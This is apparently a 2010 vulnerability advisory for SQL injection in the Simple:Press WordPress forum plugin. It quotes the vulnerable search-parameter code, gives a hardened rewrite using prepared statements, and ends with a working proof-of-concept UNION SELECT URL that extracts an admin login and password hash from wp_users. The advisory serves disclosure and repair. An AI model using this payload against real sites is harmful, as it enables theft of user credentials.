# Title: Simple:Press WordPress Plugin SQL Injection Vulnerability
# Author: ADEO Security
# Published: 03/07/2010
# Version: v4.3.0 (Possible all versions)
# Vendor: http://simple-press.com
# Download: http://simple-press.com/download-manager.php?id=228
# Description: "Simple:Press – the feature rich, completely integrated
and fully scaleable forum plugin for WordPress.
Highly customisable, Simple:Press packs the features of a standalone
forum into a plugin – seamlessly turning your WordPress site into a
community."
# Credit: Vulnerability found by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerability:
In the search field, search values are not filtered and are inserted into
SQL queries without any quotes or single quotes, and Simple:Press then
executes these SQL queries.
sf-header-forum.php
---[snip]---
385 # Add Search Vars
386 if(isset($_GET['search']))
387 {
388     if($_GET['search']!='') $sfvars['searchpage']=sf_esc_int($_GET['search']);
389     if(isset($_GET['value']) ? $sfvars['searchvalue']=stripslashes(urldecode($_GET['value'])): $sfvars['searchvalue']='');
390     if(isset($_GET['type']) ? $sfvars['searchtype']=sf_esc_int($_GET['type']): $sfvars['searchtype']=1);
400     if(isset($_GET['include']) ? $sfvars['searchinclude']=sf_esc_int($_GET['include']): $sfvars['searchinclude']=1);
401     if($sfvars['searchinclude']==0) $sfvars['searchinclude']=1;
402     if($sfvars['searchtype']==0) $sfvars['searchtype']=1;
403 }else{
---[snip]---
At line 389, the HTTP GET request parameter "value" is assigned to the global
variable $sfvars['searchvalue'] after passing through stripslashes() and
urldecode(). Those functions cannot secure it, because in the sf-database.php
file the global variable $sfvars['searchvalue'] is inserted into the SQL query
without any quotes or single quotes. Since the value is never enclosed in a
string literal, there is no quote to escape: slash stripping and magic quotes
make no difference, and whatever follows the number is parsed as SQL. Note that
"type" and "include" are passed through sf_esc_int() while "value" is not.
sf-database.php
---[snip]---
...
401 $searchvalue=urldecode($sfvars['searchvalue']);
...
404 if($sfvars['searchtype']==6)
...
409     $ANDWHERE =" AND topic_status_flag=".$sfvars['searchvalue']." ";
410
411 } elseif($sfvars['searchtype']==8)
...
414     $userid = $sfvars['searchvalue'];
415     $SELECT ="SELECT SQL_CALC_FOUND_ROWS DISTINCT ";
416     $MATCH ="";
417     $ANDWHERE =" AND ".SFPOSTS.".user_id=".$userid." ";
418
419 } elseif($sfvars['searchtype']==9)
...
422     $userid = $sfvars['searchvalue'];
...
425     $ANDWHERE =" AND ".SFTOPICS.".user_id=".$userid." ";
...
---[snip]---
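The three branches above, shown in their vulnerable shape next to a hardened rewrite, as an added example that is not the plugin's own code. The fix coerces the value to an integer and binds it through WordPress's $wpdb->prepare(); the function names, the placeholder table names and the stub constant definitions are assumptions made so the snippet stands alone.

```php
<?php
// Added example, not Simple:Press code. SFPOSTS/SFTOPICS are the plugin's
// table-name constants; the placeholder values below only make this runnable.
if (!defined('SFPOSTS'))  { define('SFPOSTS',  'wp_sfposts'); }
if (!defined('SFTOPICS')) { define('SFTOPICS', 'wp_sftopics'); }

/**
 * Vulnerable shape (as in the advisory): the value is concatenated directly.
 * No quotes surround it, so stripslashes()/magic_quotes change nothing and
 * anything after the number is appended to the query as SQL.
 */
function sf_build_search_where_vulnerable(int $searchtype, string $searchvalue): string
{
    if ($searchtype == 6) {
        return " AND topic_status_flag=" . $searchvalue . " ";
    } elseif ($searchtype == 8) {
        return " AND " . SFPOSTS . ".user_id=" . $searchvalue . " ";
    } elseif ($searchtype == 9) {
        return " AND " . SFTOPICS . ".user_id=" . $searchvalue . " ";
    }
    return "";
}

/**
 * Hardened shape (hypothetical function name): search types 6, 8 and 9 are
 * integer lookups, so reject anything that is not a plain number, cast the
 * rest to int, and bind it with $wpdb->prepare('%d'). The constants are
 * concatenated into the format string, which is safe only because table
 * names contain no '%'.
 */
function sf_build_search_where_hardened($wpdb, int $searchtype, string $searchvalue): string
{
    if (!preg_match('/^\d+$/', $searchvalue)) {
        // Non-numeric input for an integer field: no match, and worth logging
        // because legitimate clients never send it.
        error_log("simple-press search: rejected non-integer value for type $searchtype");
        return " AND 1=0 ";
    }
    $id = (int) $searchvalue;
    switch ($searchtype) {
        case 6:  return $wpdb->prepare(" AND topic_status_flag=%d ", $id);
        case 8:  return $wpdb->prepare(" AND " . SFPOSTS . ".user_id=%d ", $id);
        case 9:  return $wpdb->prepare(" AND " . SFTOPICS . ".user_id=%d ", $id);
        default: return "";
    }
}
```

With the hardened version, the request in the PoC section below yields " AND 1=0 " and a log line instead of a UNION query.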
It is successfully exploitable with search types 6, 8 and 9. Please see the PoC section.
# PoC:
Request: http://server/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2
Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo.
(0 Matches Found)

================================
Exploit-DB Notes:
================================
Tested platform:
* Ubuntu Linux version 2.6.32-22-generic (buildd@palmer) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5))
* PHP5 + Apache2 + Mysql
* Latest version of WordPress
* Simple:Press version=v4.2.2 (as of 07/05/2010 vendor still provides v4.2.2)
* Settings: Magic_Quotes = off; Global variables = On